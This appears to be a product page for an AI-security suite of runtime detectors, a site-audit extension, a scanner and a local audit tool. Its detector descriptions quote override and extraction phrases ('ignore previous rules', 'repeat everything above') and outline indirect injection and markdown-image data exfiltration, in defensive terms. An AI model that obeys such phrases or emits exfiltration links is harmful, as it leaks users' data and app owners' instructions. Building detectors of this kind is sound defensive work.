Five products. One principle: only flag what's confirmable.
Lictor is an AI-security suite that meets your app at every layer it can be
watched honestly: at runtime while the model is answering,
in the browser against a live deployment, over time
on a dashboard, across the internet as a continuous scanner, and
in your editor as a local audit. Same rule everywhere: observe,
confirm, then report. Nothing attacks a live system; nothing leaves your machine
unless you choose to publish it.
Pick by where the risk lives. The first three guard your app; Patrol is the
internet-scale scanner pillar behind the in-the-wild disclosures; the CLI is the
pre-release audit you run before you ship.
Sentinel wraps your existing OpenAI or Anthropic client with a recursive
Proxy, so it sees calls at any depth
(client.chat.completions.create,
client.messages.create, and nested helpers) without you
rewriting a line of your own logic. Before a request leaves, it runs
pre-flight checks on the input text. After the model answers, it runs
post-flight checks on the output. Seven detectors total, the
same seven in both the npm and pip builds, so a Node service and a Python
worker behave identically.
Install is one line: you wrap() the client and keep using it
as before. Apache 2.0, and no telemetry: nothing about your prompts or
completions is sent anywhere.
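The recursive-Proxy idea described above, as an added example that is not Lictor's own code: every nested namespace gets its own proxy, so a call at any depth passes through a pre-flight hook before it runs and a post-flight hook after. The names guard, hooks and fakeClient, and the single regex standing in for a detector, are assumptions made for this sketch.

```javascript
// Added illustration, not Lictor's source. guard(), hooks, fakeClient and the
// regex are hypothetical stand-ins chosen for this sketch.
function guard(target, hooks, path = []) {
  return new Proxy(target, {
    get(obj, prop) {
      const value = obj[prop];
      if (typeof prop === "symbol") return value;
      const here = [...path, prop];
      if (typeof value === "function") {
        const name = here.join(".");
        return (...args) => {
          hooks.preFlight(name, args); // throwing here stops the request
          const out = value.apply(obj, args); // keep the SDK's own `this`
          const after = (r) => { hooks.postFlight(name, r); return r; };
          // Handle promise-returning SDK methods and plain functions alike.
          return out && typeof out.then === "function" ? out.then(after) : after(out);
        };
      }
      // Recurse into nested namespaces so calls at any depth are seen.
      return value !== null && typeof value === "object"
        ? guard(value, hooks, here)
        : value;
    },
  });
}

// Constructed stand-in for an SDK client with a nested call path.
const fakeClient = {
  chat: {
    completions: {
      create: async (req) => ({ text: "echo: " + req.messages[0].content }),
    },
  },
};

const seen = []; // order in which the hooks fired
const hooks = {
  preFlight(name, args) {
    seen.push("pre:" + name);
    if (/ignore (all )?previous (rules|instructions)/i.test(JSON.stringify(args))) {
      throw new Error("blocked by pre-flight: " + name);
    }
  },
  postFlight(name) { seen.push("post:" + name); },
};

const client = guard(fakeClient, hooks);
```

Because the pre-flight hook runs synchronously inside the wrapper, a blocked request throws before the underlying SDK method is ever invoked.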
Pre-flight detectors · run on the input
PRE-FLIGHT
prompt-injection
Catches a user trying to override your instructions ("ignore previous rules", role-swap, jailbreak framing) before it reaches the model.
PRE-FLIGHT
indirect-prompt-injection
The same attack hidden inside content your app pulled in (a RAG document, a fetched page, an email) carrying instructions into the prompt second-hand.
PRE-FLIGHT
secrets-in-input
Flags an API key, token or credential that's about to be shipped off to the model provider in the prompt, a leak you'd never see in your logs.
Post-flight detectors · run on the output
POST-FLIGHT
pii-leak
Catches the model handing back personal data (emails, phone numbers, IDs) in an answer that shouldn't contain it.
POST-FLIGHT
system-prompt-leak
Catches the model reciting your system prompt back to the user: the classic "repeat everything above" exfiltration.
POST-FLIGHT
output-exfil-sink
Catches model output that's trying to smuggle data out: a markdown image or link pointed at an attacker URL with your data in the query string.
OPT-IN
slopsquat-watch
Informational only. Notices when the model suggests a package name that doesn't exist, the seed of a slopsquatting attack. Off the blocking path by default; it never blocks unless you ask it to.
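What an output-exfil-sink check can look like, as an added example that is not Lictor's detector: it scans model output for markdown images and links that point off an allowlist and carry data in the query string. The function name findExfilSinks, the allowlist, the severity labels and the sample output are assumptions constructed for this sketch.

```javascript
// Added illustration, not Lictor's detector. findExfilSinks(), the allowlist
// and the severity labels are hypothetical.
function findExfilSinks(output, allowedHosts) {
  const findings = [];
  // Markdown images and links: ![alt](url) and [text](url)
  const re = /(!?)\[[^\]]*\]\(\s*(https?:\/\/[^\s)]+)/g;
  for (const m of output.matchAll(re)) {
    let url;
    try {
      url = new URL(m[2]);
    } catch {
      continue; // not a parseable URL, nothing to report
    }
    if (allowedHosts.includes(url.hostname)) continue;
    if (url.search.length <= 1) continue; // no query string, no payload
    findings.push({
      kind: m[1] ? "image" : "link",
      host: url.hostname,
      params: [...url.searchParams.keys()], // names only, values stay out
      // Images are fetched on render with no click, so they rank higher.
      severity: m[1] ? "high" : "medium",
    });
  }
  return findings;
}

// Constructed model output: one image sink, one allowlisted link, one link sink.
const SAMPLE_OUTPUT = [
  "Here is your summary.",
  "![status](https://img.example.net/p.png?d=alice%40example.com)",
  "Docs: [guide](https://docs.example.com/start)",
  "[more](https://tracker.example.org/c?session=abc123)",
].join("\n");

const sampleFindings = findExfilSinks(SAMPLE_OUTPUT, ["docs.example.com"]);
```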
Install · one line, then nothing changes
# Node, npm
npm install @lictor/sentinel
// then wrap your client once
import OpenAI from "openai";
import { wrap } from "@lictor/sentinel";
const client = wrap(new OpenAI());
// use `client` exactly as before; pre/post-flight checks run on every call
# Python, pip
pip install lictor-sentinel
# then wrap your client once
from anthropic import Anthropic
from lictor_sentinel import wrap
client = wrap(Anthropic())
# use `client` exactly as before; same 7 detectors as the npm build
Want to see what each detector maps to in the standards? The prompt-injection,
output-handling and exfiltration detectors line up with the
OWASP Top 10 for LLM apps in the coverage map.
Product 2 · browser extension · Lictor Shield
Audit the site you're actually looking at
Shield runs 10 checks against a deployed site: the real thing on the real
domain, not your source tree. It is observe-only: it reads what the
browser already has and makes a small number of plain requests, single-lane
at one request per second per host, always with
credentials: omit so it never rides your logged-in session.
The pattern-matching is done by a Rust core compiled to WASM, so the
heavy scanning happens locally in the page, fast, with no server round-trip.
The 10 live checks
CRITICAL
Secrets in HTML & JS
Key-shaped strings the live page ships in its markup or bundled scripts.
HIGH
AI-agent fingerprint
Detects when the site is fronted by an AI agent or assistant, the surface our runtime detectors guard.
CRITICAL
Exposed .env / .git
Config and version-control directories the deployment accidentally serves.
CRITICAL
Supabase / Firebase open
A backend reachable from the page with no security rules in front of it.
HIGH
Unauth API paths
API endpoints the front-end calls that answer without a login check.
HIGH
Admin paths
Admin or dashboard surfaces left reachable on the public deployment.
HIGH
CORS
Cross-origin settings permissive enough to let another site read responses.
MEDIUM
Security headers
Missing CSP / HSTS / nosniff and the headers a framework leaves off.
MEDIUM
Mixed content
HTTPS pages pulling assets over plain HTTP, a downgrade and tamper risk.
MEDIUM
Exposed source maps
Published .map files that hand an attacker your original source.
Shield holds itself to the same evidence bar as the audit. See
the false positives we filter for why a
bare 200 OK is never enough to call something exposed.
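Why a bare 200 OK is not evidence, as an added example that is not Shield's code: a single-page app or soft-404 handler answers 200 with HTML for any path, so a check for an exposed .env has to confirm the body is dotenv-shaped before reporting. The function classifyDotEnv, its thresholds and both sample responses are assumptions constructed for this sketch.

```javascript
// Added illustration, not Shield's code. classifyDotEnv() and its thresholds
// are assumptions; it only inspects a response that was already fetched.
function classifyDotEnv(resp) {
  if (resp.status !== 200) {
    return { verdict: "not-exposed", reason: "status " + resp.status };
  }
  const type = (resp.contentType || "").toLowerCase();
  const body = resp.body || "";
  // SPA catch-all routes and soft-404 pages answer 200 with HTML for any path.
  if (type.includes("text/html") || /^\s*<(!doctype|html)\b/i.test(body)) {
    return { verdict: "not-exposed", reason: "HTML fallback page" };
  }
  const lines = body
    .split(/\r?\n/)
    .map((l) => l.trim())
    .filter((l) => l && !l.startsWith("#"));
  const pairs = lines.filter((l) => /^(export\s+)?[A-Za-z_]\w*\s*=/.test(l));
  // Require the body to look like a dotenv file, not just contain one "=".
  if (pairs.length >= 2 && pairs.length / lines.length >= 0.8) {
    return {
      verdict: "confirmed",
      reason: pairs.length + " KEY=value lines",
      // Report key names only; values never go into the finding.
      keys: pairs.map((l) => l.replace(/^export\s+/, "").split("=")[0].trim()),
    };
  }
  return { verdict: "unconfirmed", reason: "200 without dotenv-shaped content" };
}

// Constructed responses for the same path on two different deployments.
const spaFallback = {
  status: 200,
  contentType: "text/html; charset=utf-8",
  body: '<!doctype html><html><body><div id="root"></div></body></html>',
};
const realDotEnv = {
  status: 200,
  contentType: "text/plain",
  body: "# app config\nDATABASE_URL=placeholder\nAPI_KEY=placeholder\n",
};
```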
Product 3 · hosted dashboard · Lictor Guardian
The findings, gathered over time
Sentinel and Shield each tell you about a moment. Guardian is the place those moments
add up. It's a hosted dashboard and incident timeline that aggregates findings over
time, so you can see whether a problem is new, recurring, or finally resolved, and
tell that story to the people who ask. Free as a 90-day preview.
Incident timeline
Findings laid out in order: when each first appeared, when it changed, when it cleared.
Aggregated over time
One view across runs and sources, so a recurring issue reads as a pattern, not a surprise.
Free 90-day preview
Try the whole timeline for 90 days at no cost while the dashboard is in preview.
Patrol is the internet-scale scanner pillar. It starts with passive recon
(what's already public, gathered without touching the target) and adds a
precision-gated active tier that confirms a narrow set of high-signal
exposures. Every finding, passive or active, passes through a central verify
gate before it is ever reported. Until a human confirms it, a finding is
SUSPECTED, never asserted. Disclosure is ethical and observe-only:
Patrol looks, it does not break in.
The precision-gated active tier
These are the exposures the active tier confirms: each one observable from the outside, none requiring an attack.
CRITICAL
Exposed configs
Config files a deployment serves to the open internet.
CRITICAL
Open buckets
World-readable object storage with contents anyone can list.
HIGH
CORS
Cross-origin policies loose enough to leak authenticated responses.
HIGH
Subdomain takeovers
Dangling DNS pointed at a service that can be claimed.
CRITICAL
Leaked keys
Live credentials exposed in public surfaces, confirmed before report.
VERIFY GATE
SUSPECTED until verified
Nothing is reported as fact until a human clears the central verify gate.
Four slash commands, all 100% local: no token, no signup, no
telemetry. They read your code and explain what they find in plain English. The
headline command is the 48-check audit documented in full on the
coverage page.
/lictor-security-check
The 48-check pre-release audit. Detects the stack, runs every applicable check, writes a plain-English SECURITY-AUDIT.md.
/lictor-explain
Takes any finding or jargon-heavy warning and rewrites it as something a non-technical founder can act on.
/lictor-fix-it
Walks the findings one at a time, shows the proposed change, and applies it only with your explicit OK.
/lictor-rotate
Step-by-step, provider-specific rotation of a leaked key: the exact URL, the exact button, and how to confirm it worked.
Usage
# run the full 48-check audit on the current project
/lictor-security-check
# confused by a finding? get it in plain English
/lictor-explain
# apply the fixes, one at a time, with your approval
/lictor-fix-it
# a key leaked? rotate it, provider by provider
/lictor-rotate
Every product only reports what it can confirm by reading code or observing what's
already public, never by attacking a live system. Sentinel guards calls without
touching your prompts' contents off-box; Shield stays single-lane and credential-less;
Patrol holds findings at SUSPECTED until a human verifies them;
the CLI runs entirely on your machine. A scanner that cries wolf is worse than none,
so the same evidence bar runs through all of it.
Here are the false positives we filter.
Open-source. Apache 2.0. No telemetry.
Read the code before you trust it, install only the pieces you need, and run the audit
on your own machine. Start with the 48-check audit, or wrap your model client today.